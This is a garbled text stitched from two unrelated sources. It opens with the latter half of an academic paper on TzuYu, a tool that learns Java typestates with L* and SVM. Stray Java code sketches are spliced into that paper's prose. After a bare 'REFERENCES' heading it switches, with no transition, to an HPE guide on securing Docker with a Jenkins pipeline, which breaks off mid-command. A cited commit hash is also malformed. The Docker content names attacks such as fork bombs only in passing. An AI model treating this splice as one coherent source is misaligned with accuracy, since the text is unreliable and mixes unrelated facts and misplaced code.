26. \( v \leftarrow WS(\sigma_{ce}) \quad \triangleright \sigma_{ce} \) is a counterexample
27. \( E \leftarrow E \cup \{v\} \)
28. for \( tr \in P \) and \( e \in \Sigma \) do
29. Update \( T \) by \( Q_m(tr \cdot v) \) and \( Q_m(tr \cdot \langle e \rangle \cdot v) \)
30. if some \( e' \in \Sigma \) needs to be split then
31. Split(\( \Sigma, e', (P, E, T) \))
32. end if
33. end for
34. end if
35. end while

---

**Algorithm 2** Split

1.
Let \( \phi \) be the divider given by the Refiner to refine \( e \)
2. \( \Sigma \leftarrow (\Sigma \setminus \{e\}) \cup \{[\phi]e, [\neg\phi]e\} \)
3. if \( p \in P \) or \( q \in E \) has a substring \( \langle e \rangle \) then
4. split \( p \) into \( p_1 \) and \( p_2 \) such that \( p_1 \) has the substring \( [\phi]e \) and \( p_2 \) has the substring \( [\neg\phi]e \)
5. split \( q \) into \( q_1 \) and \( q_2 \) such that \( q_1 \) has the substring \( [\phi]e \) and \( q_2 \) has the substring \( [\neg\phi]e \)
6. Update \( T \) by \( Q_m(p_i \cdot q_j) \) for all \( i, j \in \{1, 2\} \)
7. end if

---

**Fig. 7.** The observation table generated by the lazy L* algorithm.

the refiner. If, however, the real object is needed, for instance, to generate a new test, we record the exact sequence of statements whose execution creates the object; the object can then be “cloned” later by re-executing these statements.

Given a candidate query, the tester generates a number of tests from the typestate. The default number (which is configurable) is twenty multiplied by the maximum length of the traces generated in membership queries before this candidate query. Each testing trace is generated by a depth-first random walk on the typestate up to a fixed length; the length is set to two plus the maximum length of the traces generated during membership queries. Due to the randomness in random testing and random walking, a test case generated previously may not appear again later. To ensure that the learning process is always improving (and hopefully converging), we store all the generated test cases so as to provide consistent answers. Notice that we do not store the instrumented states of the test cases, in order to reduce memory consumption; we re-execute a test case to re-create the states when they are needed (e.g., to evaluate the guard conditions).

One key step in our approach is to automatically generate a divider for alphabet refinement. We use the SVM techniques implemented in LibSVM [6].
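The mockup snapshot described above can be sketched as follows; this simplified version copies primitive fields and recurses into reference fields (cycle detection, arrays, and inherited fields are omitted), with small stand-in classes used for the demonstration:

```java
import java.lang.reflect.Field;
import java.util.LinkedHashMap;
import java.util.Map;

// Sketch of the mockup mechanism: primitive fields are saved directly,
// reference fields are recursively snapshotted into nested maps.
// Illustrative only; the real mechanism handles arbitrary classes.
public class Mockup {
    static class Inner { boolean flag = true; }
    static class Outer { int x = 3; Inner in = new Inner(); }

    public static Map<String, Object> snapshot(Object o) {
        Map<String, Object> snap = new LinkedHashMap<>();
        if (o == null) return snap;
        for (Field f : o.getClass().getDeclaredFields()) {
            try {
                f.setAccessible(true);
                Object v = f.get(o);
                if (f.getType().isPrimitive() || v == null) {
                    snap.put(f.getName(), v); // save primitive value directly
                } else {
                    snap.put(f.getName(), snapshot(v)); // nested mockup object
                }
            } catch (IllegalAccessException e) {
                throw new RuntimeException(e);
            }
        }
        return snap;
    }
}
```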
The first problem with using SVM is how to choose a good hyperplane, as there is in theory an infinite set of hyperplanes which separate two sets of object states. The second problem is that the hyperplane discovered by LibSVM often has floating-point coefficients, which are not as readable as integer values when we use them to build the typestate. Thus, we always (if possible) choose integer coefficients which constitute a hyperplane lying between the strongest and the weakest hyperplane.

Further, we implemented a few heuristics to preprocess the inputs to LibSVM so as to generate a better divider. Firstly, we balance the positive and negative input data sets by duplicating data randomly chosen from the smaller of the two sets, as SVM tends to build a biased hyperplane when the input data sets are imbalanced. Secondly, because the arguments of method calls are generated randomly, LibSVM may generate an incorrect divider. For instance, given a Stack with a size bound of 5, suppose \textit{push} is invoked with arguments in \{1, 2, 3\} when there are already 5 items in the stack, whereas it is invoked with arguments in \{5, 6, 7\} when there are fewer than 5 items in the stack. LibSVM may then generate a divider \textit{element} \geq 4, suggesting that calling \textit{push} with an input less than 4 will lead to failure, which is obviously incorrect. This problem is avoided with cross validation, i.e., by checking whether an argument really affects the execution results. This is done by executing the normal (failed, respectively) traces whose non-receiver arguments are substituted with the arguments in the failed (normal, respectively) traces. For instance, in the above example, additional test cases are generated so that every invocation of \textit{push} is tested with the same set of input values, i.e., \{1, 2, 3, 5, 6, 7\}. As a result, if the value is irrelevant in determining whether the test fails or succeeds, it will be ruled out by LibSVM.
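The balancing heuristic mentioned above can be sketched as follows (illustrative names; the real preprocessing feeds the balanced sets to LibSVM):

```java
import java.util.List;
import java.util.Random;

// Sketch of the class-balancing heuristic: duplicate randomly chosen
// samples from the smaller set until both sets have the same size.
public class Balance {
    public static void balance(List<double[]> pos, List<double[]> neg, Random rnd) {
        List<double[]> smaller = pos.size() < neg.size() ? pos : neg;
        int target = Math.max(pos.size(), neg.size());
        while (smaller.size() < target) {
            smaller.add(smaller.get(rnd.nextInt(smaller.size())));
        }
    }
}
```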
## V. Evaluation

In this section, we first evaluate TzuYu on a set of Java library classes selected from the JDK and then compare TzuYu with existing tools. All the experiments were carried out on a Ubuntu 13.04 PC with 2.67 GHz Intel Core i7 Duo processors and 4 GB memory. All the experimental data is available on the web site [28].

The selected JDK classes (from previous related papers [13], [27]) are shown in Table I. Column \textit{LOC} shows the size of the class in terms of lines of code. Column \#\textit{Method} is the number of methods (excluding the constructors of the target class) which are defined in the target class and used to generate the initial alphabet. In this set of experiments, we generate two values for each parameter in each method. To get a numerical vector from an object state (for SVM consumption), we limit the numerical value graphs to their top five levels, which we found to be sufficient.

### A. Results

Table I also shows the statistics of the experiments. Column \textit{T_{total}} is the total time used in milliseconds. The subsequent three columns show details about the L* algorithm. Columns \#\textit{MQ} and \#\textit{CQ} are the numbers of membership queries and candidate queries, respectively. Column \#\textit{Trace} is the total number of abstract traces generated from random walking. Column \#\textit{Trace}+ is the number of positive concrete test cases generated by TzuYu. Columns \#\textit{SVM} and \textit{T_{SVM}} are the total number of SVM calls and the time in milliseconds taken by SVM to generate dividers, respectively. The last two columns show the size of the alphabet and the number of states in the final DFA, respectively.

The following observations are made based on the results. Firstly, TzuYu successfully learned typestates in all cases efficiently, i.e., often in seconds.
Furthermore, in most cases, the time taken by SVM is less than 20\% of the total time, except for \textit{java.io.PipedOutputStream}, where the cross validation (to determine whether a method parameter is relevant) in an SVM call consumes a few seconds. Secondly, all learned

**TABLE II.** Program invariants generated by Daikon, PSYCO and TzuYu.

<table>
<thead>
<tr>
<th>Method</th>
<th>Daikon</th>
<th>PSYCO</th>
<th>TzuYu</th>
</tr>
</thead>
<tbody>
<tr>
<td>java.util.Stack.pop()</td>
<td>-</td>
<td>-</td>
<td>elementCount ≥ 1</td>
</tr>
<tr>
<td>java.util.Stack.peek()</td>
<td>-</td>
<td>-</td>
<td>elementCount ≥ 1</td>
</tr>
<tr>
<td>example.BoundedStack.push(Integer)</td>
<td>size one of {0, 1, 2}</td>
<td>size ≤ 2</td>
<td>size ≥ 1</td>
</tr>
<tr>
<td>java.io.PipedOutputStream.connect(snk)</td>
<td>-</td>
<td>-</td>
<td>sink == null && snk != null && snk.connected == false</td>
</tr>
<tr>
<td>java.io.PipedOutputStream.write(int)</td>
<td>-</td>
<td>-</td>
<td>sink != null</td>
</tr>
<tr>
<td>example.PipedOutputStream.connect(snk)</td>
<td>-</td>
<td>sink == null && snk != null && snk.connected == false</td>
<td>sink == null && snk != null && snk.connected == false</td>
</tr>
<tr>
<td>example.PipedOutputStream.write(int)</td>
<td>-</td>
<td>sink != null</td>
<td>sink != null</td>
</tr>
<tr>
<td>example.Signature.verify()</td>
<td>-</td>
<td>Signature.VERIFY == state</td>
<td>state ≥ 2</td>
</tr>
<tr>
<td>example.Signature.sign()</td>
<td>-</td>
<td>Signature.SIGN == state</td>
<td>state ≥ 1</td>
</tr>
</tbody>
</table>

typestates are sound and complete, which we confirm by comparing the learned typestates with the manually constructed actual ones. Thirdly, the number of states in the learned typestates is minimal, i.e., two, as we are differentiating only two states: failure and non-failure. This implies that for every method, whether invoking the method leads to failure can be determined by looking at the values of the data variables, and further, that SVM is able to identify a suitable proposition every time. Lastly, we did not record the memory consumption due to the garbage collection feature of the JVM.
However, the memory consumption is relatively small, since we did not store the instrumented states with the test cases and the number of stored test cases is relatively small, being linear in the number of candidate queries.

### B. Comparison with Related Tools

We identified three closely related tools. PSYCO [13] is a symbolic-execution-based typestate learning tool; ADABU [10] is a dynamic behavior model mining framework; and Daikon [12] is a dynamic invariant generator. We compare TzuYu with them in terms of time and the quality of the generated models. Table II shows the invariants generated by these tools and TzuYu. Notice that PSYCO was not available at the time of writing; we thus only obtained the learned typestates documented in their paper [13].

We first compare the models learned by the different tools, as shown in Table II. The invariants generated by ADABU are state invariants, and they are therefore skipped in Table II. Methods with the trivial invariant true (e.g., size() in Stack) are also omitted. Both ADABU and Daikon need test cases as input to mine models, and therefore we use the test cases generated by TzuYu as their input for a fair comparison. The number of test cases for each class is shown in the #TC column of Table I. Neither ADABU nor Daikon is able to learn models for all of the classes. For instance, neither tool mined models for the java.io.PipedOutputStream class. ADABU often generates multiple (e.g., dozens of) models for one class, which means that ADABU cannot merge them into one final model. That is, ADABU’s state abstraction techniques failed to generate a good invariant. The reason is that ADABU employs a set of pre-defined templates to generate invariants: if a mined state invariant contains irrelevant variables, ADABU’s state abstraction and model merging techniques fail, and therefore no unified model is generated. In another example, Daikon failed to mine models for the java.util.Stack class.
Both ADABU and Daikon use pre-defined invariant templates. In comparison, the typestates (which are invariants) generated by TzuYu are better because TzuYu does not rely on templates but rather uses SVM techniques to discover propositions dynamically based on the object states. Furthermore, Daikon uses only successful executions, whereas TzuYu uses both successful and failed executions; thus the model learned by TzuYu is more accurate than the one generated by Daikon. For the two examples (example.PipedOutputStream and example.Signature) which have been reported in paper [13], PSYCO learns accurate transition guards, due to the fact that PSYCO encodes all path conditions in the source code and uses an SMT solver to determine exactly whether failure happens. PSYCO, however, is limited by the capability of SMT solvers.

Next, we briefly compare the execution time of each tool for mining the models. The time taken by each tool is plotted in Fig. 8. Since PSYCO is not available for running on the target classes, we cannot obtain its time. Both ADABU and Daikon need test cases as input while TzuYu generates the test cases itself, so for TzuYu we only include the time consumed by SVM. The figure shows that TzuYu often uses less time in generating

![Fig. 8. Time consumed in milliseconds to mine models for target classes.](image-url)

the models. An exception is the java.io.PipedOutputStream class, for the reason mentioned above.

### C. Limitations of TzuYu

Firstly, because our approach is based on testing, there is no guarantee that the learned typestate is sound or complete. However, this can be fixed to a certain extent by using an SMT solver to verify the learned typestate. For instance, the typestate for Stack in Fig.
3 (b) can be verified by showing that each transition is sound and complete; e.g., the self-looping transition at state 1 labeled with \( [eleCount \neq 0]pop \) can be verified by proving two Hoare triples: \( \{eleCount \neq 0\}\ pop\ \{\neg error\} \) (executing pop with the pre-condition \( eleCount \neq 0 \) does not lead to an error) and \( \{eleCount = 0\}\ pop\ \{error\} \). Further, if an SMT solver identifies a counterexample, the counterexample can be used to refine the typestate. We are currently implementing this verification step in TzuYu.

Secondly, because our approach is based on random testing, there is no guarantee that a good divider can be discovered in general, though it should emerge in theory after sufficient testing. This can be partially fixed if we can obtain “better” test cases through different means, e.g., from the real execution history of the given class, or through more sophisticated test case generation methods like concolic testing [24] and combinatorial testing. It is our future work to evaluate the effectiveness of different test case generation methods in our setting.

Thirdly, our method will not terminate if the typestate for the class under analysis is beyond the expressiveness of finite-state machines with linear guard conditions. If the refiner fails to find a divider for a membership query with conflicting results (i.e., the same sequence of events leading to failure sometimes and success sometimes), a counterexample (i.e., a path which is predicted to fail by the typestate but succeeds according to the testing result, or the other way round) is returned so that \( L^* \) may introduce a new state. In the worst case, TzuYu will keep generating typestates with an ever-growing number of states (and eventually time out). This is due to a limitation of SVM that could be overcome using more advanced learning techniques.

## VI. Related Work

Our approach is related to specification mining.
We refer interested readers to the book [18] for a comprehensive literature review. Here, we only review previous work that is closely related to the three components in TzuYu and to the overall approach.

The idea of using testing as a teacher is also found in paper [14], which combines $L^*$ learning with model checking to check a system against its properties. In case of a counterexample returned by the model checker, it uses testing-based $L^*$ to augment the current model of the system, gradually progressing to the final result of either proving or disproving the system against its properties. The idea of learning interface specifications from source code was proposed in the seminal paper [3], which learns interface specifications automatically by using a model checker as the teacher. The more recent Psyco tool [13] achieves the same goal by using a symbolic execution engine as the teacher. In comparison, TzuYu employs testing and thus avoids expensive model checking or symbolic execution. Similarly, Aarts et al. [1] proposed a fully automated data abstraction technique to learn a restricted form of Mealy machine in which only testing equality of arguments is allowed. TzuYu's SVM-based alphabet refinement can be applied to more programs.

Our testing strategy is related to the Randoop tool [20]. We extend Randoop to the context of learning, in which the receiver object must be the same in order to learn a better model, and we also add a new source for reference arguments, which can be chosen from out-reference variables to improve data coverage. The tester in TzuYu is also related to TAUTOKO [9], which generates more test cases by mutating existing traces in the initially mined model (obtained using ADABU) to augment the model learning process as well as to find bugs in the class under test.

We extend the active learning $L^*$ algorithm with lazy alphabet refinement. There are also other learning algorithms such as [22].
The sk-strings algorithm [22] passively learns a DFA from a given set of traces by generalizing the method call sequences in the traces to form the final typestate. ADABU [10] can be classified as a passive learner which requires a set of test cases as input: it abstracts concrete states into abstract states using simple templates to obtain abstract traces, and then merges models from the abstract traces to generate a model. The combination of an active learning algorithm with automatic argument generation techniques enables TzuYu to learn stateful typestates automatically.

The refiner in TzuYu was inspired by the work [25] which uses SVM and an SMT solver to generate interpolants for counterexamples produced by model checkers. The goal of the refiner is in line with that of the dynamic invariant generator Daikon [12] and the tool Axiom Meister [27]. Daikon uses a set of pre-defined invariant templates over data from the given runtime traces, and may find some irrelevant invariants at a program point. Axiom Meister uses symbolic execution to collect all the path conditions, which are then abstracted into preconditions. The TzuYu refiner is based on SVM, which enables TzuYu to find relevant linear arithmetic propositions over a large number of variables.

VII. CONCLUSION

Despite the recent progress on learning specifications from various software artifacts, the community is still challenged by difficulties in dealing with data abstraction for common programs. In this paper, we propose a fully automated approach to learning typestates from source code. To fully automate the generation of test cases, which are the required inputs for many automata learning tools, we combine the active learning algorithm $L^*$ with a random argument generation technique. We then use a supervised machine learning algorithm (i.e., the SVM algorithm) to abstract data into propositions.

REFERENCES
HPE Reference Configuration for securing Docker on HPE hardware

Docker security in a DevOps environment

Contents
- Executive summary
- Introduction
- Security threats for containers
- Docker security overview
- Docker security timeline
- Reference Configuration overview
- Solution overview
- Solution components
- Hardware
- Software
- Application software
- Best practices and configuration guidance for the solution
- Configuration guidance for the solution
- Best practices for CI/CD
- Best practices for development
- Best practices for operations
- Summary
- Appendix A: Jenkins implementation details
- Building a sample project to test Jenkins service
- Proxy configuration for Jenkins
- Proxy configuration when building sample images
- Appendix B: Pipeline for building and deploying stack
- Pipeline script
- Compose file for deploying stack
- Appendix C: Content Trust implementation details
- UCP Content Trust
- Install Notary client
- Initialize trust metadata for official repositories
- Initialize trust metadata for dev repositories
- Deploy the stack in UCP
- Resources and additional links

Executive summary

Software development in the enterprise is undergoing rapid and widespread change.
Application architectures are moving from monolithic and N-tier to cloud-native microservices, while the development process has transitioned from waterfall through agile to a DevOps focus. Meanwhile, deployments have moved from the data center to hosted environments and now the cloud (public, private and hybrid), and release cycles have shrunk from quarterly to weekly, or even more frequently. To remain competitive, businesses require functionality to be delivered in a faster and more streamlined manner, while facing ever-increasing security threats from both organized and ad-hoc adversaries. Container technology promises to deliver the speed and agility required by enterprises, but a major obstacle to its adoption is its perceived security vulnerabilities. What is needed is usable security out-of-the-box, covering the entire software supply chain. At the same time, it should be customizable to facilitate easy integration into existing systems, so that current investments can be reused. Over the past few years, Docker has migrated from a developer-friendly tool to an enterprise standard solution, providing the agility and security that businesses need across the full software workflow, from development through testing to deployment and day-to-day operations. It has enhanced its security features to such an extent that it is now safe to say that applications can run more securely in containers than on bare metal.

Target audience: This paper is for CIOs, technical architects, operations and security professionals who are exploring the possibility of using Docker for enterprise application development and deployment on Hewlett Packard Enterprise hardware.

Document purpose: The purpose of this document is to describe a best practice scenario for securing Docker, from application development through the continuous integration / continuous delivery (CI/CD) pipeline.
Readers can use this document to achieve the following goals:
- Gain insight into how to leverage Docker security features throughout the CI/CD process.
- Learn by example how to build and use a CI/CD pipeline using Jenkins for Docker container development.

Introduction

Security threats for containers

Containers differ from virtual machines in that containers use a shared kernel, which facilitates faster start-up and more efficient resource usage. However, this means the kernel is a single point of failure, and any security breach can break out to all containers in the system. Securing Docker requires reducing the attack surface and limiting the "blast radius" should any attack succeed. Attacks come via a number of vectors, including:
- External attacks: These attacks take a variety of forms including distributed denial-of-service (DDoS) targeting system resources, or exploitations targeting unpatched kernel or image vulnerabilities, weak passwords or incorrectly exposed internal services. (The potentially short lifetime of a container can make it hard to include it in regular patch management cycles, so it is important to address such updates in the generation of the source, "golden" image. For more information, see the section on Immutable Infrastructure.)
- Container attacks on host: A container can, either maliciously or accidentally, cause a denial of service on the host through excessive use of memory, CPU or disk resources. Alternatively, a malicious container could launch attacks such as a "fork bomb" or a "billion laughs" XML bomb to exhaust a system's resources. Vulnerabilities in third-party containers or in the kernel itself can allow access to private information on the host, or even modification of the kernel itself.
- Container attacks on other containers: Similar denial of service attacks can be inflicted on other containers that share the same host.
These can vary from innocent "noisy neighbor" issues to infected containers accessing the information belonging to other containers. Insecure applications will still be insecure whether they run in containers or not – however, we will see that running applications within containers can significantly reduce the impact of any attack due to the underlying protections available out of the box using Docker.

Docker security overview

Docker's core philosophy on security is to make it work out of the box and easy to use, while at the same time allowing users to customize it to suit their own compliance and audit requirements. The three pillars of Docker security are:
- **Secure platform:** This consists of securing the Docker daemon and of fundamental container security features like namespaces, cgroups, capabilities, Secure Computing (Seccomp), and Linux Security Modules (for example, AppArmor, SELinux). It also covers the orchestration of nodes that participate in a swarm cluster with mutually authenticated TLS, providing authentication, authorization and encryption of data in motion.
- **Secure content:** Signing images and storing them in a trusted registry is a cornerstone of the Docker strategy for securing content. In addition, enabling Docker Content Trust will prevent any unsigned images from being used. Images in the registry can be scanned for vulnerabilities, not just at the time of creation but also on an on-going basis, so that any newly discovered threats will be flagged for remediation. Integrated secrets management allows you to safely store multiple versions of sensitive password and configuration information for use in different stages of the development and release workflow.
- **Secure access:** Docker Universal Control Plane (UCP) supports fine-grained Role-Based Access Control (RBAC) and LDAP/AD integration with external systems.
**Docker security timeline**

Over the past four years, Docker has transformed from a handy tool favored by developers into an enterprise solution that processes billions of commercial transactions every day. Along the way, a number of security concerns have arisen that might lead a business executive to doubt whether a tool championed by developers is suitable for deployment in front-line production systems. Headlines warning of "Container Breakout", "Privilege Escalation" and "Dirty Cow Vulnerabilities" have generated fear, uncertainty and doubt, and in this paper we address those concerns. We show how Docker has proactively addressed these issues over successive releases, using multiple layers of security in a defense-in-depth strategy, so that security is now built-in and usable while also being highly customizable, preserving any existing investment in security infrastructure. In particular, we look at how Docker can increase security across the entire software supply chain, from development, integration and testing through to the delivery and deployment of complex, business-critical applications on multiple programming stacks and platforms.
<table>
<thead>
<tr> <th>Date</th> <th>Release</th> <th>Features</th> </tr>
</thead>
<tbody>
<tr> <td>Aug 2014</td> <td>1.2</td> <td>Capabilities</td> </tr>
<tr> <td>Oct 2014</td> <td>1.3</td> <td>SELinux, AppArmor</td> </tr>
<tr> <td>Dec 2014</td> <td>1.4</td> <td>Security vulnerabilities addressed</td> </tr>
<tr> <td>Aug 2015</td> <td>1.8</td> <td>Docker Content Trust (Image signing based on Notary)</td> </tr>
<tr> <td>Nov 2015</td> <td>1.9</td> <td>Security Scanning</td> </tr>
<tr> <td>Feb 2016</td> <td>1.10</td> <td>User namespace, seccomp, authorization plug-in</td> </tr>
<tr> <td>Feb 2016</td> <td>Datacenter 1.0</td> <td>Role-Based Access Control (RBAC), LDAP/AD</td> </tr>
<tr> <td>May 2016</td> <td>1.11</td> <td>Comprehensive CIS Benchmark, Yubikey hardware image signing</td> </tr>
<tr> <td>June 2016</td> <td>1.12</td> <td>Secure-by-default out-of-the-box, yet customizable (mutually authenticated TLS, providing authentication, authorization and encryption to the communications of every node participating in a swarm)</td> </tr>
<tr> <td>Jan 2017</td> <td>1.13</td> <td>Secrets management, System prune for garbage collection</td> </tr>
<tr> <td>Jan 2017</td> <td>Datacenter 2.0</td> <td>Image security scanning and vulnerability monitoring</td> </tr>
<tr> <td>March 2017</td> <td>17.03</td> <td>Latest release at time of writing</td> </tr>
</tbody>
</table>

**Reference Configuration overview**

This Reference Configuration (RC) covers best practices for overall security across the entire software development lifecycle. It uses the sample Docker application, the example voting app found at [https://github.com/dockersamples/example-voting-app](https://github.com/dockersamples/example-voting-app), in a continuous integration / continuous delivery (CI/CD) pipeline using Jenkins to identify best practices for the development, build, and deployment stages of the lifecycle.
The configuration uses HPE ProLiant DL360 (Gen 9 and Gen 8) servers but the over-arching principles for securing the enterprise software lifecycle apply to all Docker EE deployments on Hewlett Packard Enterprise hardware, including Hyper Converged, Synergy and SimpliVity offerings. For more targeted information about other platforms, see the HPE Reference Configuration for Docker Datacenter on HPE Hyper Converged 380 and the HPE Reference Configuration for Docker Enterprise Edition (EE) Standard on HPE Synergy with HPE Synergy Image Streamer. This version of the Reference Configuration focuses on best practices for overall security in the development lifecycle and, as such, we do not cover specific networking or storage configurations. For more information, see HPE Reference Configuration for Docker Datacenter on Bare Metal with Persistent Docker Volumes. Docker Reference Architectures are available at https://success.docker.com/Architecture, including ones for Security, Development Pipeline and Deployment Architecture.

**Solution overview**

The solution, as shown in Figure 1, consists of a two-node cluster for the continuous integration/continuous delivery (CI/CD) system with Docker Universal Control Plane (UCP) on one manager node and Docker Trusted Registry (DTR) on the second, worker node.

![ Solution overview diagram ]

**Figure 1. Solution overview**

**Solution components**

The following components were utilized in this Reference Configuration.

**Hardware**

The following hardware components were utilized in this Reference Configuration as listed in Table 2.

**Table 2.
Hardware Components** <table> <thead> <tr> <th>Component</th> <th>Purpose</th> </tr> </thead> <tbody> <tr> <td>HPE ProLiant DL360 Gen9</td> <td>Bare-metal Docker swarm host for CI/CD environment</td> </tr> <tr> <td>HPE ProLiant DL360 Gen8</td> <td>Bare-metal Docker swarm host for CI/CD environment</td> </tr> </tbody> </table> Software The following software components were utilized in this Reference Configuration as listed below in Table 3. <table> <thead> <tr> <th>Component</th> <th>Version</th> </tr> </thead> <tbody> <tr> <td>Docker Universal Control Plane (UCP)</td> <td>2.1.4</td> </tr> <tr> <td>Docker Trusted Registry (DTR)</td> <td>2.2.4</td> </tr> <tr> <td>Docker Engine</td> <td>17.03.1-ee-3</td> </tr> <tr> <td>HPE Insight Control server provisioning</td> <td>7.6</td> </tr> <tr> <td>Jenkins</td> <td>jenkins:2.46.3-alpine</td> </tr> <tr> <td>Jenkins Swarm Client</td> <td>3.3</td> </tr> <tr> <td>Docker example voting app</td> <td><a href="https://github.com/dockersamples/example-voting-app/commit/44efef623c0d1ab3c7853a3bc4006465e8341b6c3">https://github.com/dockersamples/example-voting-app/commit/44efef623c0d1ab3c7853a3bc4006465e8341b6c3</a></td> </tr> </tbody> </table> Docker Enterprise Edition Advanced Docker Enterprise Edition (EE) is designed for enterprise development and IT teams who build, ship and run business critical applications in production at scale. Docker EE is integrated, certified and supported to provide enterprises with the most secure container platform in the industry to modernize all applications. An application-centric platform, Docker EE is designed to accelerate and secure the entire software supply chain, from development to production, running on any infrastructure. The Advanced edition adds security scanning and continuous vulnerability monitoring on top of the Standard edition features such as advanced image and container management, LDAP/AD user integration, and Role-Based Access Control (RBAC). 
Docker Enterprise Edition provides integrated container management and security. Enterprise-ready capabilities like multi-tenancy, security and full support for the Docker API give IT teams the ability to scale operations efficiently without breaking the developer experience. Open interfaces allow for easy integration into existing systems and the flexibility to support any range of business processes. Docker EE provides a unified software supply chain for all apps, from commercial off-the-shelf software and homegrown monoliths to modern microservices written for Windows® or Linux® environments on any server, VM or cloud.

Docker Enterprise Edition features include:
- Built-in clustering and orchestration.
- Integrated management of all app resources from a single web admin UI.
- Secure, multi-tenant system with granular Role-Based Access Control (RBAC) and LDAP/AD integration.
- End-to-end security model with secrets management, image signing and image security scanning.
- Self-healing application deployments with the ability to apply rolling application updates.
- Open and extensible framework, supporting existing enterprise systems and processes.

HPE Insight Control server provisioning (ICsp)

Insight Control server provisioning (ICsp) build scripts are used to automate the deployment of Docker EE on the HPE ProLiant servers. Insight Control server provisioning is designed to streamline server provisioning administrative tasks. It simplifies the process of deploying operating systems on HPE ProLiant bare-metal servers as well as virtual machines. HPE Insight Control server provisioning allows the administrator to perform the following tasks:
- Install Microsoft® Windows Server®, Linux, VMware® vSphere®, and Microsoft Hyper-V on HPE ProLiant servers.
- Deploy to target servers with, or without, PXE.
- Run deployment jobs on multiple servers simultaneously.
- Customize HPE ProLiant deployments with an easy-to-use, browser-based interface.

The ICsp build scripts to automate the deployment of Docker EE on HPE ProLiant servers are available at https://github.com/HewlettPackard/ICsp-Docker-OSBP. For this Reference Configuration, the servers are running Red Hat Enterprise Linux®, RHEL 7.2, and so the prerequisites for running the scripts in this particular environment include:
- Installing and configuring ICsp to deploy the RHEL OS
- A Red Hat® network account to download files from the Internet, or access to an internal RHEL repository
- Setting a proxy hostname and port, as the target systems in this particular environment are behind a proxy

**Application software**

The application software for this Reference Configuration includes Jenkins and various Jenkins build agents. The Jenkins image, jenkins:2.46.3-alpine, is downloadable from https://store.docker.com/images/jenkins while the Jenkins Swarm Client is available at https://repo.jenkins-ci.org/releases/org/jenkins-ci/plugins/swarm-client/3.3/swarm-client-3.3.jar.

**Best practices and configuration guidance for the solution**

In smaller organizations, developers usually perform multiple roles including building, testing and deploying the software they write. In large companies, however, there tend to be more clearly defined roles and responsibilities, even if this distinction is blurring somewhat with the advent of DevOps. This section covers best practices for development, integration, testing, delivery and deployment in an enterprise environment. A typical CI/CD workflow using Docker Enterprise is shown in Figure 2.

![Figure 2. CI/CD workflow using Docker Enterprise Edition](image)

Code is pulled from the Source Code Management (SCM) system, build artifacts are produced (for example, Java is compiled into jar or war files), and these artifacts are stored in the appropriate repository (for example, Artifactory).
Docker images are created using the build artifacts and pushed to a local registry, taking advantage of the signing, scanning and secret management features. These images are combined to deploy services to the cluster, which can then be tested and approved by the QA team.

Configuration guidance for the solution

In this section, we start with the installed software (Docker EE with a running swarm) and then:
- Configure a CI/CD environment using Jenkins
- Add build agents for Jenkins
- Build images for a sample application
- Push the images to a local repository, signing and scanning them for security
- Deploy the application to the swarm

We use the Docker example voting app, https://github.com/dockersamples/example-voting-app, as shown in Figure 3, consisting of:
- Python webapp which lets you vote between two options
- Redis queue which collects new votes
- .NET worker which consumes votes and stores them in a Postgres database
- Postgres database backed by a Docker volume
- Node.js webapp which shows the results of the voting in real time

Figure 3. Example voting application

Configuring Jenkins

In this configuration, we run Jenkins as a service on a Docker swarm using a recent image from Docker Hub. For the sake of simplicity, we use the local filesystem for storing Jenkins setup and build data by creating and mounting the jenkins_home directory – in a real-world scenario, you would configure a persistent storage volume. As a consequence of this simplification, we want the master and build agents to run on the same swarm manager node.

Identify Jenkins node

We explicitly identify this swarm manager node by adding a label using `docker node update --label-add env=jenkins 10.10.174.27` and then targeting that node using a constraint when starting the service.

Note: You can check if the label has been applied correctly to the node using the command `docker node inspect self`.
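As a quick sanity check of the label step that needs no live swarm, the same pattern can be exercised against a simulated fragment of `docker node inspect` output. The JSON below is a hand-written stand-in for illustration, not real inspect output.

```shell
# Simulated check: confirm the env=jenkins label would be visible.
# On a real manager node, pipe `docker node inspect self` through the same grep.
INSPECT_JSON='{"Spec":{"Labels":{"env":"jenkins"},"Role":"manager"}}'
if printf '%s' "$INSPECT_JSON" | grep -q '"env":"jenkins"'; then
  echo "label env=jenkins present"
else
  echo "label missing"
fi
```

Note that `docker node inspect` pretty-prints its JSON across multiple lines, so on a real node a format string such as `docker node inspect self --format '{{ .Spec.Labels }}'` is a more robust way to read the labels; treat the snippet above as a sketch of the idea only.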
Start Jenkins service

Once you have created the `jenkins_home` directory locally (and ensured that the container's `jenkins` user has write access to it), create the service for the Jenkins master as follows:

```bash
docker service create \
 --name jenkins-noproxy \
 -p 8082:8080 \
 -p 50000:50000 \
 --constraint 'node.labels.env == jenkins' \
 -e JENKINS_OPTS="--prefix=/jenkins" \
 --mount "type=bind,source=$PWD/jenkins_home,target=/var/jenkins_home" \
 jenkins:2.46.3-alpine
```

Jenkins is now available at `http://10.10.174.27:8082/jenkins` and will prompt for a password that can be retrieved from `jenkins_home/secrets/initialAdminPassword`. If Jenkins cannot connect to the internet, it will prompt you to configure the proxy settings by displaying the Manage Jenkins → Manage Plugins → Advanced screen. Once configured, proceed to install the suggested plugins and then set up the first admin user account and corresponding password. To test the installation, it is recommended that you follow the example in Appendix A in the section Build sample project to test Jenkins service.

Install Self-Organizing Swarm plug-in

Jenkins agents running as services on the Docker swarm facilitate the building of projects in various programming languages. These agents require the installation of the Self-Organizing Swarm Plug-in Modules. Navigate to Manage Jenkins → Manage Plugins → Available, search using the term "swarm" and then install the Self-Organizing Swarm plug-in.

Note: The "swarm" here confusingly refers to the similarly-named but separate Jenkins Swarm Client rather than the underlying Docker swarm.

The Jenkins agents use JNLP to connect to the Jenkins master and each agent is used for a specific technology.
Installing Docker build agents There are a number of ways to create Jenkins agents so that they can build, push and deploy Docker images and the method that you use will have an impact on your overall security posture: - **Unsecured**: Using a base Docker image and sharing the Docker socket (`/var/run/docker.sock`) to facilitate running Docker commands on the host node (“Docker out of Docker”). - **Secure**: Using a base Linux image, installing Docker CLI and using UCP client bundle to allow the `jenkins` user to access the authorized TCP socket rather than the unauthenticated/unauthorized Docker socket. In both instances, a layer is added to set up the Java-based communications with the Jenkins master. If the `jenkins_home/workspace` directory does not already exist locally (it will if you built the sample project) then you will need to create it and ensure that the container has write access to it. Using the authorized TCP socket (secure) While it can be convenient to share the Docker socket, you should be aware that this can leave you open to privilege escalation and instead you should always use the authorized TCP socket. Here we start with a small alpine image and then install the Docker CLI, docker-compose and the Java Swarm Client jar. ``` docker service create --name docker-agent-cli \ --mode global \ --constraint 'node.labels.env 